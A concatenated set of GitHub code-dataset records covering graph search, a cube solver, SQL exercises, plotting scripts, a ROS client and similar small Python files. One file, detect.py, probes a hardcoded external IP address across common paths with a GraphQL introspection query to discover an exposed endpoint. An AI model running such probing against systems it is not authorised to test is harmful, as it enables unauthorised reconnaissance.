g.add_edge(4, 5)\n g.add_edge(4, 6)\n g.add_edge(5, 7)\n g.add_edge(6, 7)\n print(g)\n bfs_prev = bfs(g, 0, 7)\n print_vertex_trace(bfs_prev, 0, 7)\n dfs_prev = recursive_dfs(g, 0, 7)\n print_vertex_trace(dfs_prev, 0, 7) \n dfs2_prev = dfs(g, 0, 7)\n print_vertex_trace(dfs2_prev, 0, 7) \n","repo_name":"free-free/algorithm","sub_path":"graph/graph_search.py","file_name":"graph_search.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"70266341873","text":"from typing import Union, Optional\n\nimport magic\n\nfrom d20.Manual.BattleMap import FileObject\nfrom d20.Manual.Templates import (NPCTemplate,\n registerNPC)\nfrom d20.Manual.Facts import (MimeTypeFact, # type: ignore\n Fact)\n\n\n# Process basic information to initially populate fact table\n@registerNPC(\n name=\"MimeTypeNPC\",\n description=(\"This NPC provides the mimetype of an object.\"),\n creator=\"Mike Goffin\",\n version=\"0.1\",\n engine_version=\"0.1\"\n)\nclass MimeTypeNPC(NPCTemplate):\n def __init__(self, **kwargs: str) -> None:\n super().__init__(**kwargs)\n\n def handleData(self, **kwargs: FileObject) -> None:\n if 'data' not in kwargs:\n raise RuntimeError(\"Expected 'data' in arguments\")\n\n dataObj: FileObject = kwargs['data']\n data: Union[bytes, bytearray, memoryview] = dataObj.data\n try:\n mimetype: Optional[str] = magic.from_buffer(data, mime=True)\n except Exception:\n mimetype = None\n if mimetype:\n mimetype = mimetype.split(';')[0]\n else:\n mimetype = None\n try:\n filetype: Optional[str] = magic.from_buffer(data)\n except Exception:\n filetype = 'Unknown'\n mimetypeFact: Fact = MimeTypeFact(\n mimetype=mimetype,\n filetype=filetype,\n parentObjects=[dataObj.id]\n )\n self.console.addFact(mimetypeFact)\n","repo_name":"MITRECND/d20","sub_path":"d20/NPCS/MimeTypeNPC.py","file_name":"MimeTypeNPC.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"39"} +{"seq_id":"23764795140","text":"import random\nimport sys\nimport time\nimport sys\n\nMOVES = {\n \"U\": [2, 0, 3, 1, 20, 21, 6, 7, 4, 5, 10, 11, 12, 13, 14, 15, 8, 9, 18, 19, 16, 17, 22, 23],\n \"U'\": [1, 3, 0, 2, 8, 9, 6, 7, 16, 17, 10, 11, 12, 13, 14, 15, 20, 21, 18, 19, 4, 5, 22, 23],\n \"R\": [0, 9, 2, 11, 6, 4, 7, 5, 8, 13, 10, 15, 12, 22, 14, 20, 16, 17, 18, 19, 3, 21, 1, 23],\n \"R'\": [0, 22, 2, 20, 5, 7, 4, 6, 8, 1, 10, 3, 12, 9, 14, 11, 16, 17, 18, 19, 15, 21, 13, 23],\n \"F\": [0, 1, 19, 17, 2, 5, 3, 7, 10, 8, 11, 9, 6, 4, 14, 15, 16, 12, 18, 13, 20, 21, 22, 23],\n \"F'\": [0, 1, 4, 6, 13, 5, 12, 7, 9, 11, 8, 10, 17, 19, 14, 15, 16, 3, 18, 2, 20, 21, 22, 23],\n \"D\": [0, 1, 2, 3, 4, 5, 10, 11, 8, 9, 18, 19, 14, 12, 15, 13, 16, 17, 22, 23, 20, 21, 6, 7],\n \"D'\": [0, 1, 2, 3, 4, 5, 22, 23, 8, 9, 6, 7, 13, 15, 12, 14, 16, 17, 10, 11, 20, 21, 18, 19],\n \"L\": [23, 1, 21, 3, 4, 5, 6, 7, 0, 9, 2, 11, 8, 13, 10, 15, 18, 16, 19, 17, 20, 14, 22, 12],\n \"L'\": [8, 1, 10, 3, 4, 5, 6, 7, 12, 9, 14, 11, 23, 13, 21, 15, 17, 19, 16, 18, 20, 2, 22, 0],\n \"B\": [5, 7, 2, 3, 4, 15, 6, 14, 8, 9, 10, 11, 12, 13, 16, 18, 1, 17, 0, 19, 22, 20, 23, 21],\n \"B'\": [18, 16, 2, 3, 4, 0, 6, 1, 8, 9, 10, 11, 12, 13, 7, 5, 14, 17, 15, 19, 21, 23, 20, 22],\n}\n\nclass Cube:\n\n def __init__(self, string=\"WWWW RRRR GGGG YYYY OOOO BBBB\"):\n self.stateString = string.replace(\" \", \"\")\n self.solvedStateString=\"WWWWRRRRGGGGYYYYOOOOBBBB\"\n self.solvedState=[i for i in self.solvedStateString]\n self.moves=[ \"U\", \"U'\", \"R\" , \"R'\", \"F\" , \"F'\", \"D\" , \"D'\", \"L\" , \"L'\", \"B\" , \"B'\"]\n self.currState = [i for i in self.stateString]\n self.fixedPair={0:\"U D'\",1:\"R L'\",2:\"D U'\",3:\"F B'\",4:\"L R'\",5:\"B F'\"}\n\n def createStateList(self,state):\n return [[char for char in state[i:i+4]] for i in range(0, len(''.join(state)), 4)]\n\n def norm(self,fixedPoint):\n self.applyMovesStr(self.fixedPair[fixedPoint])\n\n def normalize(self):\n for j in range(4):\n for k in range(4):\n self.norm(0)\n if [self.stateString[10],self.stateString[12],self.stateString[19]] == [\"G\",\"Y\",\"O\"]:\n return True\n self.norm(3)\n self.norm(1)\n for j in range(2):\n for k in range(4):\n self.norm(0)\n if [self.stateString[10],self.stateString[12],self.stateString[19]] == [\"G\",\"Y\",\"O\"]:\n return True\n self.norm(1)\n self.norm(1)\n return False\n\n def equals(self, cube=None):\n if cube==None:\n cube = self\n checkCube:Cube = self.clone(state=self.solvedState)\n for j in range(4):\n for k in range(4):\n checkCube.norm(0)\n if cube.stateString == checkCube.stateString:\n return True\n checkCube.norm(3)\n checkCube.norm(1)\n for j in range(2):\n for k in range(4):\n checkCube.norm(0)\n if cube.stateString == checkCube.stateString:\n return True\n checkCube.norm(1)\n checkCube.norm(1)\n return False\n\n def clone(self,state=None):\n if state==None:\n state=self.currState\n \n clone = ''\n for i in range(0, len(state), 4):\n clone+=''.join(state[i:i+4]) + \" \"\n\n return Cube(clone)\n\n # apply a move to a state\n def applyMove(self, move):\n newState = []\n if move in MOVES:\n for colorIdx in MOVES[move]:\n newState.append(self.currState[colorIdx])\n\n self.currState = newState\n self.stateString = ''.join(self.currState)\n\n # apply a string sequence of moves to a state\n def applyMovesStr(self, alg:str):\n seq = alg.split()\n for i in seq:\n self.applyMove(i)\n \n\n def isSolved(self):\n if self.isSolvedQuick():\n return self.equals()\n return False\n \n def isSolvedQuick(self):\n lst = self.createStateList(self.currState)\n for i in lst:\n if len(set(i)) != 1:\n return False\n return True\n \n def shuffle(self, n):\n moveHistory = []\n for _ in range(n):\n randomNumber = random.randint(0, len(self.moves)-1)\n move = self.moves[randomNumber]\n self.applyMove(move)\n moveHistory.append(move)\n print(\"Shuffled Move Seq:\",' '.join(moveHistory))\n\n\n def printHelper(self,cubes):\n printHelperList=[]\n remainder = len(cubes)%3\n if remainder != 0:\n printHelperList.append([self.createStateList(cube) for cube in cubes[-remainder:]])\n cubes = cubes[:-remainder]\n for idx, lstIdx in enumerate(range(0,len(cubes),3)):\n addLst = [self.createStateList(cube) for cube in cubes[lstIdx:lstIdx+3]]\n printHelperList.insert(idx,addLst)\n return printHelperList \n\n def print(self,cubes = None):\n if cubes==None:\n listCubes = [[self.createStateList(self.currState)]]\n else:\n newLst = []\n listCubes = self.printHelper(cubes)\n print(end=\"\\n\")\n # print(\"-\"*13+\"-\"*14*(len(listCubes[0])-1)+\"|\")\n for idxLst, lst in enumerate(listCubes):\n length = len(lst)\n for idx in range(length):\n print(f\" {lst[idx][0][0]}{lst[idx][0][1]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][0][2]}{lst[idx][0][3]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][4][0]}{lst[idx][4][1]} {lst[idx][2][0]}{lst[idx][2][1]} {lst[idx][1][0]}{lst[idx][1][1]} {lst[idx][5][0]}{lst[idx][5][1]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][4][2]}{lst[idx][4][3]} {lst[idx][2][2]}{lst[idx][2][3]} {lst[idx][1][2]}{lst[idx][1][3]} {lst[idx][5][2]}{lst[idx][5][3]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][3][0]}{lst[idx][3][1]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][3][2]}{lst[idx][3][3]}\",end=\" \")\n print(end=\"\\n\\n\")\n # if length > 1:\n # for idx in range(length-1):\n # if idxLst is not len(listCubes)-1 and idx >= len(listCubes[idxLst+1]):\n # print(\"-\"*13,end=\"-\")\n # else:\n # print(\"-\"*13,end=\"+\")\n # print(\"-\"*13+\"|\")","repo_name":"satwikShresth/Rubiks_2x2x2_solver","sub_path":"Cube.py","file_name":"Cube.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1451850326","text":"import sys\nimport time\nimport logging\nfrom watchdog.observers import Observer\nfrom watchdog.events import *\nimport jieba\n\ndef fenci(filepath):\n f=open(filepath,\"r\")\n fn=open(\".\"+filepath,'a+')\n for line in f.readlines():\n seg_list = jieba.cut(line, cut_all=False)\n s= \"/ \".join(seg_list)\n fn.write(s)\n fn.close()\n f.close()\n print('end')\n\n\nclass FileEventHandler(FileSystemEventHandler):\n def __init__(self):\n FileSystemEventHandler.__init__(self)\n\n def on_moved(self, event):\n if event.is_directory:\n print(\"directory moved from {0} to {1}\".format(event.src_path,event.dest_path))\n else:\n print(\"file moved from {0} to {1}\".format(event.src_path,event.dest_path))\n\n def on_created(self, event):\n if event.is_directory:\n print(\"directory created:{0}\".format(event.src_path))\n else:\n fenci(event.src_path)\n print(\"file created:{0}\".format(event.src_path))\n\n def on_deleted(self, event):\n if event.is_directory:\n print(\"directory deleted:{0}\".format(event.src_path))\n else:\n print(\"file deleted:{0}\".format(event.src_path))\n\n def on_modified(self, event):\n if event.is_directory:\n print(\"directory modified:{0}\".format(event.src_path))\n else:\n print(\"file modified:{0}\".format(event.src_path))\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n path = '.'\n event_handler = FileEventHandler()\n observer = Observer()\n observer.schedule(event_handler, path, recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n","repo_name":"SizzleWang/AscEndS","sub_path":"watchdog.py","file_name":"watchdog.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27470418028","text":"# Cezary Świtała\n# Kod użyty do generowania wykresów\n# pojawiających się w sprawozdaniu.\n\nfrom fisher import * # import własnych metod przydatnych przy wyliczaniu wartośći \n# funkcji gęstości rozkładu fishera\nimport math\nimport numpy\nimport matplotlib.pyplot as pyplot\n\ndef map_list(f, x): \n return list(map(f,x))\n\nx = numpy.linspace(0.001,4,num=200)\n\nfisher_1_1 = get_fisher_distr_density_function(1,1)\nfisher_2_1 = get_fisher_distr_density_function(2,1)\nfisher_4_1 = get_fisher_distr_density_function(4,1)\nfisher_4_2 = get_fisher_distr_density_function(4,2)\nfisher_4_4 = get_fisher_distr_density_function(4,4)\nfisher_6_4 = get_fisher_distr_density_function(6,4)\n\npyplot.plot(x, map_list(fisher_1_1, x), label=\"m=1,n=1\")\npyplot.plot(x, map_list(fisher_2_1, x), label=\"m=2,n=1\", color=\"red\")\npyplot.plot(x, map_list(fisher_4_1, x), label=\"m=4,n=1\", color=\"black\")\npyplot.plot(x, map_list(fisher_4_2, x), label=\"m=4,n=2\", color=\"green\")\npyplot.plot(x, map_list(fisher_4_4, x), label=\"m=4,n=4\", color=\"orange\")\npyplot.plot(x, map_list(fisher_6_4, x), label=\"m=6,n=4\", color=\"purple\")\npyplot.axis([0,4,0,1.5])\npyplot.legend()\npyplot.show()\npyplot.clf()\n\nfisher_1_1_cumulative = get_cumulative_fisher_distr(1,1,13);\nfisher_2_1_cumulative = get_cumulative_fisher_distr(2,1);\nfisher_4_1_cumulative = get_cumulative_fisher_distr(4,1);\nfisher_4_2_cumulative = get_cumulative_fisher_distr(4,2);\nfisher_4_4_cumulative = get_cumulative_fisher_distr(4,4);\nfisher_6_4_cumulative = get_cumulative_fisher_distr(6,4);\n\npyplot.plot(x, map_list(fisher_1_1_cumulative, x), label=\"m=1,n=1\")\npyplot.plot(x, map_list(fisher_2_1_cumulative, x), label=\"m=2,n=1\", color=\"red\")\npyplot.plot(x, map_list(fisher_4_1_cumulative, x), label=\"m=4,n=1\", color=\"black\")\npyplot.plot(x, map_list(fisher_4_2_cumulative, x), label=\"m=4,n=2\", color=\"green\")\npyplot.plot(x, map_list(fisher_4_4_cumulative, x), label=\"m=4,n=4\", color=\"orange\")\npyplot.plot(x, map_list(fisher_6_4_cumulative, x), label=\"m=6,n=4\", color=\"purple\")\npyplot.axis([0,4,0,1])\npyplot.legend()\npyplot.show()","repo_name":"MusicFreak456/Uniwroc","sub_path":"SemestrIV/RPiS/Pracownia/1/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36889730166","text":"#!/usr/bin/env python3.7\n\nimport zoo_diversity_analysis\n\nimport re,glob,argparse\n\nparser = argparse.ArgumentParser(description=\"Process a shorah read file to filter and calculate the average number of polymorphic sites\\n\")\nessentialArgs = parser.add_argument_group('Files', 'Required arguments')\nessentialArgs.add_argument('-i','--input',metavar='input',required=True,type=str,dest='shorah_input',help=\"The reads.fas output file from ShoRAH\")\nessentialArgs.add_argument('-o','--output',metavar='output',required=True,type=str,dest='output_file',help=\"The file to print the results to\")\n#essentialArgs.add_argument('-r','--reference',metavar='reference',required=True,type=str,dest='reference_file',help=\"The file containing the reference sequence used in ShoRAH\")\nnonEssentialArgs = parser.add_argument_group('Conditions','Optional arguments')\n\nnonEssentialArgs.add_argument('-l','--pipeline-shorah',metavar='shorah',required=False,type=bool,dest='shorah',help=\"A boolean to indicate if the input is from the shorah pipeline, by default this is False.\")\nnonEssentialArgs.add_argument('-d','--directory',metavar='directory',required=False,type=bool,dest='input_is_directory',help=\"A boolean to indicate if the input is a directory or not, by default this is False.\")\nnonEssentialArgs.add_argument('-c','--continuous-mismatches',metavar='continuous',required=False,type=int,dest='contiguous_filter',help=\"The number of consecutive mismatches after which a particular read should be dropped.\")\nnonEssentialArgs.add_argument('-C','--minimum-predicted-coverage',metavar='coverage',required=False,type=float,dest='coverage',help=\"The average number of expected read coverages for the predicted local haplotypes.\")\nnonEssentialArgs.add_argument('-p','--minimum-sequence-posterior-probability',metavar='min_prob',required=False,type=float,dest='min_prob',help=\"The required posterior probability for the predicted local haplotypes.\")\nnonEssentialArgs.add_argument('-f','--identity-filter',metavar='identity',required=False,type=float,dest='identity',help=\"The required number of matches for a read to be included.\")\nnonEssentialArgs.add_argument('-M','--mega_output',metavar='MEGA',required=False,type=str,dest='MEGA',help=\"A prefix for outputing reads in short local alignments for subsequent analysis.\")\n# NOTE the following two arguments are dealt with here\nnonEssentialArgs.add_argument('-s','--input-files-suffix',metavar='input_suffix',required=False,type=str,dest='input_suffix',help=\"The suffix, or extension for the files that are to be used as input, by default .fas.\")\nnonEssentialArgs.add_argument('-O','--merge-output',metavar='merge_output',required=False,type=bool,dest='merge_output',help=\"A boolean to indicate whether the output should be merged or not, either True or False (default).\")\nnonEssentialArgs.add_argument('-w','--window-length',metavar='window_length',required=False,type=int,dest='window_length',help=\"The length of the windows to be used (by default 66).\")\nnonEssentialArgs.add_argument('-W','--wattersons-statistic',metavar='wattersons_statistic',required=False,type=bool,dest='wattersons_statistic',help=\"A boolean to indicate whether to use wattersons theta (True), or pi (if -W is not provided, default)\")\nnonEssentialArgs.add_argument('-N','--minimum-no-haplotypes',metavar='minimum_haplotypes',required=False,type=int,dest='minimum_haplotypes',help=\"The minimum required number of haplotypes for the diversity analysis to ve performed (default 2)\")\n\narguments = parser.parse_args()\n\n# use the input_is_directory argument to either find the files, or to use the input argument directly\n\nif arguments.input_suffix is None:\n arguments.input_suffix = \".fas\"\nif arguments.merge_output is None:\n arguments.merge_output = False\nif arguments.input_is_directory is None:\n arguments.input_is_directory = False\nif arguments.shorah is None:\n arguments.shorah = False\nif arguments.wattersons_statistic is None:\n arguments.wattersons_statistic = False\n\nif arguments.minimum_haplotypes is None:\n arguments.minimum_haplotypes = 2\n\n\nif arguments.contiguous_filter is None:\n arguments.contiguous_filter = 10\nif arguments.min_prob is None:\n arguments.min_prob = 0.95\nif arguments.identity is None:\n arguments.identity = 0.95\nif arguments.coverage is None:\n arguments.coverage = 0\nif arguments.input_suffix is None:\n arguments.input_suffix = \"\"\nif arguments.merge_output is None:\n arguments.merge_output = False\nif arguments.window_length is None:\n arguments.window_length = 66\n\n\n\n\nif arguments.input_is_directory:\n file_list = glob.glob(arguments.shorah_input + \"/*\" + arguments.input_suffix)\n for aFile in file_list:\n if arguments.merge_output:\n output = open(arguments.output_file,\"a\")\n zoo_diversity_analysis.main(aFile,output,arguments.contiguous_filter,arguments.identity,arguments.MEGA,arguments.window_length,arguments.wattersons_statistic,arguments.coverage,arguments.min_prob,arguments.minimum_haplotypes,arguments.shorah)\n else:\n exp = re.compile(r\".*/(.*)\\.\\w+$\")\n excludingExtension = re.match(exp,aFile)\n theFile = excludingExtension.group(1) + arguments.output_file\n output = open(theFile,\"w\")\n zoo_diversity_analysis.main(aFile,output,arguments.contiguous_filter,arguments.identity,arguments.MEGA,arguments.window_length,arguments.wattersons_statistic,arguments.coverage,arguments.min_prob,arguments.minimum_haplotypes,arguments.shorah)\nelse:\n output = open(arguments.output_file,\"a\")\n zoo_diversity_analysis.main(arguments.shorah_input,output,arguments.contiguous_filter,arguments.identity,arguments.MEGA,arguments.window_length,arguments.wattersons_statistic,arguments.coverage,arguments.min_prob,arguments.minimum_haplotypes,arguments.shorah)\n","repo_name":"Zoophobus/diversity","sub_path":"zoo_diversity.py","file_name":"zoo_diversity.py","file_ext":"py","file_size_in_byte":5815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28192233802","text":"from sqlalchemy.ext.asyncio import AsyncSession\n\nfrom models.base_engine import Model, RecordTimestampFields\nimport sqlalchemy as sa\n\nfrom models.db_models import User\nfrom models.enums import CoinValueChangeEnum\n\n\nclass ActionsEconomy(Model, RecordTimestampFields):\n __tablename__ = \"actions_economy\"\n\n id = sa.Column(sa.Integer, primary_key=True, autoincrement=True)\n action_name = sa.Column(sa.String, nullable=False)\n description = sa.Column(sa.Text)\n change_type: CoinValueChangeEnum = sa.Column(sa.String, nullable=False)\n change_amount = sa.Column(sa.Integer, nullable=False, server_default=\"0\")\n\n @classmethod\n async def execute(\n cls,\n session: AsyncSession,\n action_name: str,\n coin_receiver_user_id: int,\n ):\n\n action = (\n await session.execute(\n sa.select(\n ActionsEconomy.action_name,\n ActionsEconomy.change_type,\n ActionsEconomy.change_amount,\n ).where(ActionsEconomy.action_name == action_name)\n )\n ).fetchone()\n\n user_coins = (\n (\n await session.execute(\n sa.select(User.coins).where(User.id == coin_receiver_user_id)\n )\n )\n .fetchone()\n .coins\n )\n\n if action.change_type == \"EARN\":\n new_coin_value = user_coins + action.change_amount\n sign = \"\"\n else:\n new_coin_value = user_coins - action.change_amount\n sign = \"-\"\n if new_coin_value < 0:\n raise cls.InsufficientCoins(\"Not enough coins\")\n\n await session.execute(\n sa.update(User)\n .where(User.id == coin_receiver_user_id)\n .values({User.coins: new_coin_value})\n )\n\n return {\n \"change_amount\": f\"{sign}{action.change_amount}\",\n \"coins\": new_coin_value,\n }\n\n @staticmethod\n async def verify_possibility(\n session: AsyncSession,\n user_id: int,\n action_names: list\n | None = None, # if there is no action names - then check all\n ):\n actions = (\n await session.execute(\n sa.select(\n ActionsEconomy.action_name,\n ActionsEconomy.change_type,\n ActionsEconomy.change_amount,\n )\n )\n ).fetchall()\n user_wallet = (\n (await session.execute(sa.select(User.coins).where(User.id == user_id)))\n .fetchone()\n .coins\n )\n if not action_names:\n action_names = [action.action_name for action in actions]\n always_true = {\n action.action_name: True\n for action in actions\n if all(\n [\n action.action_name in action_names,\n action.change_type == CoinValueChangeEnum.EARN,\n ]\n )\n }\n possibilities = {\n action.action_name: (user_wallet - action.change_amount) > 0\n for action in actions\n if all(\n [\n action.action_name in action_names,\n action.change_type == CoinValueChangeEnum.SPEND,\n ]\n )\n }\n return {**always_true, **possibilities}\n","repo_name":"MajorXaker/showmeplace-api","sub_path":"models/db_models/economy.py","file_name":"economy.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"26357661872","text":"#!/usr/bin/env python\nnum = int(input())\nheights = [0] + [int(x) for x in input().split()] + [0]\ncnt = 0\nup = heights[0] < heights[1]\nfor i in range(num + 1):\n if up and heights[i] > heights[i + 1]:\n cnt += 1\n up = False\n if not up and heights[i] < heights[i + 1]:\n # cnt += 1\n up = True\nprint(cnt)\n","repo_name":"aLagoG/kygerand","sub_path":"rpc/1/h.py","file_name":"h.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"18443719686","text":"#!/usr/bin/python3\n\"\"\"This script adds the State object “Louisiana” to\nthe database hbtn_0e_6_usa\"\"\"\n\nimport sqlalchemy\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sys import argv\nfrom sqlalchemy.orm import sessionmaker\n\n\nif __name__ == \"__main__\":\n \"\"\"to be accessed directly for MetaData-specific operations.\"\"\"\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.format(\n argv[1], argv[2], argv[3]), pool_pre_ping=True)\n\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n\n new_state = State(name='Louisiana')\n session.add(new_state)\n query = session.query(State).filter_by(name='Louisiana').first()\n print(new_state.id)\n session.commit()\n session.close()\n","repo_name":"EylenS/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/11-model_state_insert.py","file_name":"11-model_state_insert.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2696228253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 11 14:54:55 2022\r\n\r\n@author: Sam\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport numpy as np\r\n#sediment flow parameters\r\nq0=0.22; a=1.1; \r\n#bed shape parameters\r\nb=0.2; k=2.0; eps=0.5; #bed porosity not given so I'll assume 0.5\r\n#space domain\r\nxdelta=0.1;\r\nstart=0.0; end=4.0;\r\nx=np.arange(start, end+xdelta,xdelta)\r\n#time domain\r\ntdelta=[0.05,0.1,0.15]\r\n#clear figures\r\nplt.cla(); plt.clf();\r\n#setup\r\nn=[];\r\nplt.style.use(\"dark_background\");\r\nfig, ax= plt.subplots(figsize=[4.8, 3.6],dpi=300);\r\n# initial conditions plot\r\nn.append(b*np.sin(k*x));\r\nax.plot(x,n[0],label=\"t=0\");\r\n# different time delta plots\r\nfor i in range(len(tdelta)):\r\n n.append( b*np.sin(k*x)-tdelta[i]*(a*b*k/eps)*np.cos(k*x) );\r\n ax.plot(x,n[i+1],label=\"$\\Delta t=$\"+str(tdelta[i]));\r\n# style of the plot\r\nax.set_xlabel(\"location (m)\");\r\nax.set_ylabel(\"bed elevation (m)\");\r\nax.legend();\r\nax.grid(True);\r\nplt.show();\r\n#now with a plot of the flow on top\r\nplt.style.use(\"default\");\r\nfig2, ax2= plt.subplots(figsize=[4.8, 3.6],dpi=300);\r\nax2.plot(x,n[0],label=\"$\\eta (x)$\",zorder=0);\r\ny_dummy=x*0;\r\nq=q0+a*n[0];\r\nax2.quiver(x,n[0],q,y_dummy,zorder=1);\r\n\r\n# style of the plot\r\nax2.set_xlabel(\"location (m)\");\r\nax2.set_ylabel(\"bed elevation (m)\");\r\nax2.set_title(\"flux $q_s$ on surface\");\r\nax2.legend();\r\nax2.grid(True);\r\nplt.show();","repo_name":"y05emite-sam/dep_mechanics","sub_path":"hw1/problem1.3.py","file_name":"problem1.3.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12633228072","text":"\"\"\"\nMedian of two sorted arrays\nGiven two sorted arrays nums1 and nums2 of size m and n respectively, return the median of the two sorted arrays.\n\nThe overall run time complexity should be O(log (m+n)).\n\n@Author: Venkat Rebba \n\"\"\"\nclass Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n \n l1 = len(nums1)\n l2 = len(nums2)\n nums3 = []\n \n i, j, k = 0, 0, 0\n \n while True:\n \n if i>=l1 or j>=l2:\n break\n \n if nums1[i] >= nums2[j]:\n nums3.append(nums2[j])\n j += 1\n \n else:\n nums3.append(nums1[i])\n i += 1\n \n k += 1\n \n if l1-i > 0:\n nums3.extend(nums1[i:])\n \n if l2-j > 0:\n nums3.extend(nums2[j:])\n \n \n m = len(nums3)//2 \n med = nums3[m] if (len(nums3)%2 == 1) else (nums3[m-1] + nums3[m])/2\n return med\n \n \nn1 = [1,2,3]\nn2 = [2, 4, 5]\n\nsol = Solution()\nprint(sol.findMedianSortedArrays(n1, n2))\n ","repo_name":"venkatrebba/Leetcode_practice","sub_path":"meanOfTwoSortedArrays.py","file_name":"meanOfTwoSortedArrays.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"42511827564","text":"#!/usr/bin/python3\n\"\"\"\nMy Safe Filter States Module\n\"\"\"\nimport MySQLdb\nimport sys\n\n\nargv = sys.argv\nif argv.__len__() == 5:\n ALX_DB_DETAIL = {\n 'host': \"localhost\",\n 'port': 3306,\n 'user': argv[1],\n 'passwd': argv[2],\n 'db': argv[3]\n }\n search_n = argv[4]\n db = MySQLdb.connect(**ALX_DB_DETAIL)\n cursor = db.cursor()\n query = \"\"\"SELECT cities.name\n FROM cities\n JOIN states ON cities.state_id = states.id\n WHERE states.name = %s\n ORDER BY cities.id ASC;\"\"\"\n cursor.execute(query, (search_n,))\n records = cursor.fetchall()\n my_list = [x[0] for x in records]\n print(\", \".join(my_list))\n \"\"\" record_count = cursor.rowcount\n for i in range(0, record_count):\n if i == record_count-1:\n print(cursor.fetchone()[0])\n else:\n print(cursor.fetchone()[0], end=', ')\"\"\"\n cursor.close()\n db.close()\n","repo_name":"NiiAdjei-001/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26398644087","text":"import json\r\nimport requests\r\nfrom urllib import parse\r\n\r\npaths = [\r\n \"\",\r\n \"/graphql\",\r\n \"/graphql/console\",\r\n \"graphql.php\",\r\n \"graphiql\",\r\n \"explorer\",\r\n \"altair\",\r\n \"/playground\"\r\n]\r\n\r\nquery = \"\"\"{\r\n __schema {\r\n types {\r\n name\r\n }\r\n }\r\n}\r\n\"\"\"\r\n\r\nfor path in paths:\r\n hostname = 'http://159.100.248.211'\r\n endpoint = parse.urljoin(hostname, path)\r\n try:\r\n print(f\"Attempt: {endpoint}\")\r\n response = requests.post(endpoint, json={'query': query}, timeout=0.1)\r\n except Exception:\r\n print(\"No GraphQL endpoint found\")\r\n else:\r\n if response.status_code == 200:\r\n json_data = json.loads(response.text)\r\n if json_data.get('data'):\r\n print(\"It is a GraphQL endpoint\",endpoint)\r\n","repo_name":"MarkDan101/graphdetect","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"34501634182","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport sys\nimport rospy\nfrom beginner_tutorials.srv import *\n\ndef Celsius2Fahrenheit_client(x):\n rospy.wait_for_service('C2F')\n try:\n C2FF = rospy.ServiceProxy('C2F', Celsius2Fahrenheit)\n return C2FF(x)\n except rospy.ServiceException as e:\n print(\"Service call failed: %s\"%e)\n\ndef usage():\n return \"%s [x]\"% float(sys.argv[0])\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n x = float(sys.argv[1])\n Celsius2Fahrenheit_client(x)\n else:\n print(usage())\n sys.exit(1)\n print(\"Requesting %s\"%(x))\n var=x*1.8+32\n print(str(x)+\" Celsius degrees is \" + str(var) + \" Fahrenheit degrees\")\n \n","repo_name":"I1C/TemperatureConverterClientServer","sub_path":"scripts/Celsius2Fahrenheit_client.py","file_name":"Celsius2Fahrenheit_client.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"33610794945","text":"from styles import *\r\nfrom ventanaViaje import *\r\nfrom ventanaEmpresa import *\r\nfrom ventanaChoferes import *\r\n\r\nclass VentanaPrincipal(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.setWindowTitle(\"Remiseria\")\r\n self.mainLayout = QVBoxLayout()\r\n \r\n self.titulo = Text(string=\"Bienvenido a Empresa de Jhoskin\", fontF=\"Cambria\", fontS=20)\r\n 